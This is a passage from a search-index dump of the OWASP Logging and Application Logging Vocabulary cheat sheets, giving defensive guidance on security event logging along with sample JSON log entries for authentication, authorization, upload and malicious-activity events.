"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html","title":"Logging Cheat Sheet","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet is focused on providing developers with concentrated guidance on building application logging mechanisms, especially related to security logging.

Many systems enable network device, operating system, web server, mail server and database server logging, but custom application event logging is often missing, disabled or poorly configured. Application event logging provides much greater insight than infrastructure logging alone. Web application (e.g. web site or web service) logging is much more than having web server logs enabled (e.g. using Extended Log File Format).

Application logging should be consistent within the application, consistent across an organization's application portfolio and use industry standards where relevant, so the logged event data can be consumed, correlated, analyzed and managed by a wide variety of systems.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#purpose","title":"Purpose","text":"

Application logging should always be included for security events. Application logs are invaluable data for:

Application logging might also be used to record other types of events, such as:

Process monitoring, audit and transaction logs/trails etc. are usually collected for different purposes than security event logging, and this often means they should be kept separate.

The types of events and details collected will tend to be different.

For example, a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. It is important not to log too much, or too little.

Use knowledge of the intended purposes to guide what, when and how much. The remainder of this cheat sheet primarily discusses security event logging.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#design-implementation-and-testing","title":"Design, implementation and testing","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#event-data-sources","title":"Event data sources","text":"

The application itself has access to a wide range of information events that should be used to generate log entries. Thus, the primary event data source is the application code itself.

The application has the most information about the user (e.g. identity, roles, permissions) and the context of the event (target, action, outcomes), and often this data is not available to either infrastructure devices, or even closely-related applications.

Other sources of information about application usage that could also be considered are:

The degree of confidence in the event information has to be considered when including event data from systems in a different trust zone. Data may be missing, modified, forged, replayed and could be malicious \u2013 it must always be treated as untrusted data.

Consider how the source can be verified, and how integrity and non-repudiation can be enforced.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#where-to-record-event-data","title":"Where to record event data","text":"

Applications commonly write event log data to the file system or a database (SQL or NoSQL). Applications installed on desktops and on mobile devices may use local storage and local databases, as well as sending data to remote storage.

Your selected framework may limit the available choices. All types of applications may send event data to remote systems (instead of or as well as more local storage).

This could be a centralized log collection and management system (e.g. SIEM or SEM) or another application elsewhere. Consider whether the application can simply send its event stream, unbuffered, to stdout, for management by the execution environment.

Consider separate files/tables for extended event information such as error stack traces or a record of HTTP request and response headers and bodies.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#which-events-to-log","title":"Which events to log","text":"

The level and content of security monitoring, alerting and reporting needs to be set during the requirements and design stage of projects, and should be proportionate to the information security risks. This can then be used to define what should be logged.

There is no one size fits all solution, and a blind checklist approach can lead to unnecessary \"alarm fog\" that means real problems go undetected.

Where possible, always log:

Optionally consider if the following events can be logged and whether it is desirable information:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#event-attributes","title":"Event attributes","text":"

Each log entry needs to include sufficient information for the intended subsequent monitoring and analysis. It could be full content data, but is more likely to be an extract or just summary properties.

The application logs must record \"when, where, who and what\" for each event.

The properties for these will be different depending on the architecture, class of application and host system/device, but often include the following:

Additionally consider recording:

For more information on these, see the \"other\" related articles listed at the end, especially the comprehensive article by Anton Chuvakin and Gunnar Peterson.

Note A: The \"Interaction identifier\" is a method of linking all (relevant) events for a single user interaction (e.g. desktop application form submission, web page request, mobile app button click, web service call). The application knows all these events relate to the same interaction, and this should be recorded instead of losing the information and forcing subsequent correlation techniques to re-construct the separate events. For example a single SOAP request may have multiple input validation failures and they may span a small range of times. As another example, an output validation failure may occur much later than the input submission for a long-running \"saga request\" submitted by the application to a database server.

Note B: Each organisation should ensure it has a consistent, and documented, approach to classification of events (type, confidence, severity), the syntax of descriptions, and field lengths & data types including the format used for dates/times.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#data-to-exclude","title":"Data to exclude","text":"

Never log data unless it is legally sanctioned. For example intercepting some communications, monitoring employees, and collecting some data without consent may all be illegal.

Never exclude any events from \"known\" users such as other internal systems, \"trusted\" third parties, search engine robots, uptime/process and other remote monitoring systems, pen testers, auditors. However, you may want to include a classification flag for each of these in the recorded data.

The following should usually not be recorded directly in the logs, but instead should be removed, masked, sanitized, hashed or encrypted:

Sometimes the following data can also exist, and whilst useful for subsequent investigation, it may also need to be treated in some special manner before the event is recorded:

Consider using personal data de-identification techniques such as deletion, scrambling or pseudonymization of direct and indirect identifiers where the individual's identity is not required, or the risk is considered too great.

In some systems, sanitization can be undertaken post log collection, and prior to log display.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#customizable-logging","title":"Customizable logging","text":"

It may be desirable to be able to alter the level of logging (type of events based on severity or threat level, amount of detail recorded). If this is implemented, ensure that:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#event-collection","title":"Event collection","text":"

If your development framework supports suitable logging mechanisms, use or build upon them. Otherwise, implement an application-wide log handler which can be called from other modules/components.

Document the interface referencing the organisation-specific event classification and description syntax requirements.

If possible create this log handler as a standard module that can be thoroughly tested, deployed in multiple applications, and added to a list of approved & recommended modules.

Note C: This is not always possible where the application is running on a device under some other party's control (e.g. on an individual's mobile phone, on a remote customer's workstation which is on another corporate network). In these cases attempt to measure the time offset, or record a confidence level in the event timestamp.

Where possible record data in a standard format, or at least ensure it can be exported/broadcast using an industry-standard format.

In some cases, events may be relayed or collected together at intermediate points. In the latter case, some data may be aggregated or summarized before forwarding on to a central repository and analysis system.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#verification","title":"Verification","text":"

Logging functionality and systems must be included in code review, application testing and security verification processes:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#network-architecture","title":"Network architecture","text":"

As an example, the diagram below shows a service that provides business functionality to customers. We recommend creating a centralized system for collecting logs. There may be many such services, but all of them must securely collect logs in a centralized system.

Applications of this business service are located in network segments:

The service responsible for collecting IT events, including security events, is located in the following segments:

For example, all external requests from users go through the API management service; see the application in the MIDDLEWARE 2 segment.

As the diagram above shows, at the network level the processes of saving and downloading logs require different network access (ports) to be opened; the arrows are highlighted in different colors. Also, saving and downloading are performed by different applications.

Full network segmentation cheat sheet by sergiomarotco: link

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#deployment-and-operation","title":"Deployment and operation","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#release","title":"Release","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#operation","title":"Operation","text":"

Enable processes to detect whether logging has stopped, and to identify tampering or unauthorized access and deletion (see protection below).

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#protection","title":"Protection","text":"

The logging mechanisms and collected event data must be protected from mis-use such as tampering in transit, and unauthorized access, modification and deletion once stored. Logs may contain personal and other sensitive information, or the data may contain information regarding the application's code and logic.

In addition, the collected information in the logs may itself have business value (to competitors, gossip-mongers, journalists and activists) such as allowing the estimate of revenues, or providing performance information about employees.

This data may be held on end devices, at intermediate points, in centralized repositories and in archives and backups.

Consider whether parts of the data may need to be excluded, masked, sanitized, hashed or encrypted during examination or extraction.

At rest:

In transit:

See NIST SP 800-92 Guide to Computer Security Log Management for more guidance.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#monitoring-of-events","title":"Monitoring of events","text":"

The logged event data needs to be available for review, and processes need to be in place for appropriate monitoring, alerting and reporting:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#disposal-of-logs","title":"Disposal of logs","text":"

Log data, temporary debug logs, and backups/copies/extractions must not be destroyed before the end of the required data retention period, and must not be kept beyond this time.

Legal, regulatory and contractual obligations may impact on these periods.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#attacks-on-logs","title":"Attacks on Logs","text":"

Because of their usefulness as a defense, logs may be a target of attacks. See also OWASP Log Injection and CWE-117.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#confidentiality","title":"Confidentiality","text":"

Who should be able to read what? A confidentiality attack enables an unauthorized party to access sensitive information stored in logs.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#integrity","title":"Integrity","text":"

Which information should be modifiable by whom?

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#availability","title":"Availability","text":"

What downtime is acceptable?

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#accountability","title":"Accountability","text":"

Who is responsible for harm?

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#related-articles","title":"Related articles","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html","title":"Application Logging Vocabulary Cheat Sheet","text":"

This document proposes a standard vocabulary for logging security events. The intent is to simplify monitoring and alerting such that, assuming developers trap errors and log them using this vocabulary, monitoring and alerting would be improved by simply keying on these terms.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#overview","title":"Overview","text":"

Each year IBM Security commissions the Ponemon Institute to survey companies around the world for information related to security breaches, mitigation, and the associated costs; the result is called the Cost of a Data Breach Report.

In addition to the millions of dollars lost due to breaches, the report finds that the mean time to identify a breach continues to hover around 200 days. Clearly, improving our ability to monitor applications and alert on anomalous behavior would improve our time to identify and mitigate an attack against our applications.

IBM Cost of a Data Breach Study 2020, Fig.34, pg.52, [https://www.ibm.com/security/data-breach]

This logging standard seeks to define specific keywords which, when applied consistently across software, would allow groups to simply monitor for these event terms across all applications and respond quickly in the event of attack.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#assumptions","title":"Assumptions","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#getting-started","title":"Getting Started","text":"

As a reminder, the goal of logging is to be able to alert on specific security events. Of course, the first step to logging these events is good error handling: if you're not trapping the events, you don't have an event to log.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#identifying-events","title":"Identifying Events","text":"

In order to better understand security event logging, a good high-level understanding of threat modeling is helpful, even if it's a simple approach of:

  1. What could go wrong?

    * Orders: could someone order on behalf of another?
    * Authentication: could I log in as someone else?
    * Authorization: could I see someone else's account?

  2. What would happen if it did?

    * Orders: I've placed an order on behalf of another... to an abandoned warehouse in New Jersey. Oops.
    * Then I bragged about it on 4Chan.
    * Then I told the New York Times about it.

  3. Who might intend to do this?

    * Intentional attacks by hackers.
    * An employee \"testing\" how things work.
    * An API coded incorrectly doing things the author did not intend.
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#format","title":"Format","text":"

NOTE: All dates should be logged in ISO 8601 format WITH UTC offset to ensure maximum portability

{\n    \"datetime\": \"2021-01-01T01:01:01-0700\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"AUTHN_login_success:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 login successfully\",\n    \"useragent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\",\n    \"source_ip\": \"165.225.50.94\",\n    \"host_ip\": \"10.12.7.9\",\n    \"hostname\": \"portalauth.foobar.com\",\n    \"protocol\": \"https\",\n    \"port\": \"440\",\n    \"request_uri\": \"/api/v2/auth/\",\n    \"request_method\": \"POST\",\n    \"region\": \"AWS-US-WEST-2\",\n    \"geo\": \"USA\"\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#the-vocabulary","title":"The Vocabulary","text":"

What follows are the various event types that should be captured. For each event type there is a prefix like \"authn\" and additional data that should be included for that event.

Portions of the full logging format are included for example, but a complete event log should follow the format above.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authentication-authn","title":"Authentication [AUTHN]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_successuserid","title":"authn_login_success[:userid]","text":"

Description All login events should be recorded including success.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_success:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 login successfully\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_successafterfailuseridretries","title":"authn_login_successafterfail[:userid,retries]","text":"

Description The user successfully logged in after previously failing.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_successafterfail:joebob1,2\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 login successfully\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_failuserid","title":"authn_login_fail[:userid]","text":"

Description All login events should be recorded including failure.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_fail:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 login failed\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_fail_maxuseridmaxlimitint","title":"authn_login_fail_max[:userid,maxlimit(int)]","text":"

Description All login events should be recorded including failure.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_fail_max:joebob1,3\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 reached the login fail limit of 3\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_login_lockuseridreason","title":"authn_login_lock[:userid,reason]","text":"

Description When the feature exists to lock an account after x retries or other condition, the lock should be logged with relevant data.

Level: WARN

Reasons:

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_login_lock:joebob1,maxretries\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 login locked because maxretries exceeded\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_password_changeuserid","title":"authn_password_change[:userid]","text":"

Description Every password change should be logged, including the userid that it was for.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_password_change:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has successfully changed their password\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_password_change_failuserid","title":"authn_password_change_fail[:userid]","text":"

Description An attempt to change a password that failed. May also trigger other events such as authn_login_lock.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_password_change:joebob1\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 failed to changing their password\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_impossible_traveluseridregion1region2","title":"authn_impossible_travel[:userid,region1,region2]","text":"

Description When a user is logged in from one city and suddenly appears in another, too far away to have traveled in a reasonable timeframe, this often indicates a potential account takeover.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_impossible_travel:joebob1,US-OR,CN-SH\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"User joebob1 has accessed the application in two distant cities at the same time\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_createduserid-entitlements","title":"authn_token_created[:userid, entitlement(s)]","text":"

Description When a token is created for service access, it should be recorded.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"aws.foobar.com\",\n    \"event\": \"authn_token_created:app.foobarapi.prod,create,read,update\",\n    \"level\": \"INFO\",\n    \"description\": \"A token has been created for app.foobarapi.prod with create,read,update\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_revokeduseridtokenid","title":"authn_token_revoked[:userid,tokenid]","text":"

Description A token has been revoked for the given account.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"aws.foobar.com\",\n    \"event\": \"authn_token_revoked:app.foobarapi.prod,xyz-abc-123-gfk\",\n    \"level\": \"INFO\",\n    \"description\": \"Token ID: xyz-abc-123-gfk was revoked for user app.foobarapi.prod\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_reuseuseridtokenid","title":"authn_token_reuse[:userid,tokenid]","text":"

Description A previously revoked token was attempted to be reused.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"aws.foobar.com\",\n    \"event\": \"authn_token_reuse:app.foobarapi.prod,xyz-abc-123-gfk\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"User app.foobarapi.prod attempted to use token ID: xyz-abc-123-gfk which was previously revoked\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authn_token_deleteappid","title":"authn_token_delete[:appid]","text":"

Description When a token is deleted, it should be recorded.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authn_token_delete:foobarapi\",\n    \"level\": \"WARN\",\n    \"description\": \"The token for foobarapi has been deleted\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authorization-authz","title":"Authorization [AUTHZ]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authz_failuseridresource","title":"authz_fail[:userid,resource]","text":"

Description An attempt was made to access a resource which was unauthorized.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authz_fail:joebob1,resource\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"User joebob1 attempted to access a resource without entitlement\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authz_changeuseridfromto","title":"authz_change[:userid,from,to]","text":"

Description The user's or entity's entitlements were changed.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authz_change:joebob1,user,admin\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 access was changed from user to admin\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#authz_adminuseridevent","title":"authz_admin[:userid,event]","text":"

Description All activity by privileged users such as admin should be recorded.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"authz_admin:joebob1,user_privilege_change\",\n    \"level\": \"WARN\",\n    \"description\": \"Administrtator joebob1 has updated privileges of user foobarapi from user to admin\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#excessive-use-excess","title":"Excessive Use [EXCESS]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#excess_rate_limit_exceededuseridmax","title":"excess_rate_limit_exceeded[userid,max]","text":"

Description Expected service limit ceilings should be established and alerted when exceeded, even if simply for managing costs and scaling.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"excess_rate_limit_exceeded:app.foobarapi.prod,100000\",\n    \"level\": \"WARN\",\n    \"description\": \"User app.foobarapi.prod has exceeded max:100000 requests\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#file-upload-upload","title":"File Upload [UPLOAD]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_completeuseridfilenametype","title":"upload_complete[userid,filename,type]","text":"

Description On a successful file upload, the first step in the validation process is confirming that the upload has completed.

Level: INFO

Example:

    {\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_complete:joebob1,user_generated_content.png,PNG\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has uploaded user_generated_content.png\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_storedfilenamefromto","title":"upload_stored[filename,from,to]","text":"

Description One step in good file upload validation is to move/rename the file and when providing the content back to end users, never reference the original filename in the download. This is true both when storing in a filesystem as well as in block storage.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_stored:user_generated_content.png,kjsdhkrjhwijhsiuhdf000010202002\",\n    \"level\": \"INFO\",\n    \"description\": \"File user_generated_content.png was stored in the database with key abcdefghijk101010101\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_validationfilenamevirusscanimagemagickfailedincompletepassed","title":"upload_validation[filename,(virusscan|imagemagick|...):(FAILED|incomplete|passed)]","text":"

Description All file uploads should have some validation performed, both for correctness (is in fact of file type x), and for safety (does not contain a virus).

Level: INFO|CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_validation:filename,virusscan:FAILED\",\n    \"level\": \"CRITICAL\",\n    \"description\": \"File user_generated_content.png FAILED virus scan and was purged\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#upload_deleteuseridfileid","title":"upload_delete[userid,fileid]","text":"

Description When a file is deleted for normal reasons it should be recorded.

Level: INFO

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"upload_delete:joebob1,\",\n    \"level\": \"INFO\",\n    \"description\": \"User joebob1 has marked file abcdefghijk101010101 for deletion.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#input-validation-input","title":"Input Validation [INPUT]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#input_validation_failfielduserid","title":"input_validation_fail[:field,userid]","text":"

Description When input validation fails on the server-side it must either be because a) sufficient validation was not provided on the client, or b) client-side validation was bypassed. In either case it's an opportunity for attack and should be mitigated quickly.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"input_validation_fail:date_of_birth,joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 submitted data that failed validation.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious-behavior-malicious","title":"Malicious Behavior [MALICIOUS","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_excess_404useridipuseragent","title":"malicious_excess_404:[userid|IP,useragent]","text":"

Description When a user makes numerous requests for files that don't exist, it is often an indicator of attempts to \"force-browse\" for files that could exist, and is often behavior indicating malicious intent.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_excess404:123.456.789.101,M@l1c10us-Hax0rB0t0-v1\",\n    \"level\": \"WARN\",\n    \"description\": \"A user at 123.456.789.101 has generated a large number of 404 requests.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_extraneoususeridipinputnameuseragent","title":"malicious_extraneous:[userid|IP,inputname,useragent]","text":"

Description When a user submits data to a backend handler that was not expected, it can indicate probing for input validation errors. If your backend service receives data it does not handle or have an input for, this is an indication of likely malicious abuse.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_extraneous:dr@evil.com,creditcardnum,Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0\",\n    \"level\": \"WARN\",\n    \"description\": \"User dr@evil.com included field creditcardnum in the request which is not handled by this service.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_attack_tooluseridiptoolnameuseragent","title":"malicious_attack_tool:[userid|IP,toolname,useragent]","text":"

Description When obvious attack tools are identified either by signature or by user agent they should be logged.

TODO: A future version of this standard should link to known attack tools, signatures and user-agent strings. For instance, the tool \"Nikto\" leaves behind its user agent by default with a string like \"Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:Port Check)\"

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_attack_tool:127.0.0.1,nikto,Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:Port Check)\",\n    \"level\": \"WARN\",\n    \"description\": \"Attack traffic indicating use of Nikto coming from 127.0.0.1\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_corsuseridipuseragentreferer","title":"malicious_cors:[userid|IP,useragent,referer]","text":"

Description When attempts are made from unauthorized origins they should of course be blocked, but also logged whenever possible. Even if we block an illegal cross-origin request the fact that the request is being made could be an indication of attack.

NOTE: Did you know that the word \"referer\" is misspelled in the original HTTP specification? The correct spelling should be \"referrer\" but the original typo persists to this day and is used here intentionally.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_cors:127.0.0.1,Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0,attack.evil.com\",\n    \"level\": \"WARN\",\n    \"description\": \"An illegal cross-origin request from 127.0.0.1 was referred from attack.evil.com\"\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#malicious_direct_referenceuseridip-useragent","title":"malicious_direct_reference:[userid|IP, useragent]","text":"

Description A common attack against authentication and authorization is to directly access an object without credentials or appropriate access authority. This flaw used to have its own entry in the OWASP Top Ten, called Insecure Direct Object Reference. Assuming you've correctly prevented this attack, logging the attempt is valuable to identify malicious users.

Level: CRITICAL

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_direct:joebob1, Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 attempted to access an object to which they are not authorized\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#privilege-changes-privilege","title":"Privilege Changes [PRIVILEGE]","text":"

This section focuses on object privilege changes, such as changes to read/write/execute permissions on files, or changes to the authorization meta-information of objects in a database.

Changes to users/accounts are covered in the User Management section.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#privilege_permissions_changeduseridfileobjectfromleveltolevel","title":"privilege_permissions_changed:[userid,file|object,fromlevel,tolevel]","text":"

Description Tracking changes to objects to which there are access control restrictions can uncover attempts by unauthorized users to escalate privileges on those files.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"malicious_direct:joebob1, /users/admin/some/important/path,0511,0777\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 changed permissions on /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive-data-changes-data","title":"Sensitive Data Changes [DATA]","text":"

It's not necessary to log or alert on changes to all files, but in the case of highly sensitive files or data it is important that we monitor and alert on changes.

"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_createuseridfileobject","title":"sensitive_create:[userid,file|object]","text":"

Description When a new piece of data is created and marked as sensitive or placed into a directory/table/repository where sensitive data is stored, that creation should be logged and reviewed periodically.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_create:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 created a new file in /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_readuseridfileobject","title":"sensitive_read:[userid,file|object]","text":"

Description All data marked as sensitive or placed into a directory/table/repository where sensitive data is stored should have access logged and reviewed periodically.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_read:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 read file /users/admin/some/important/path\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sensitive_updateuseridfileobject","title":"sensitive_update:[userid,file|object]","text":"

Description All data marked as sensitive or placed into a directory/table/repository where sensitive data is stored should have updates to the data logged and reviewed periodically.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sensitive_update:joebob1, /users/admin/some/important/path\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 modified file /users/admin/some/important/path\",\n    ...\n}\n
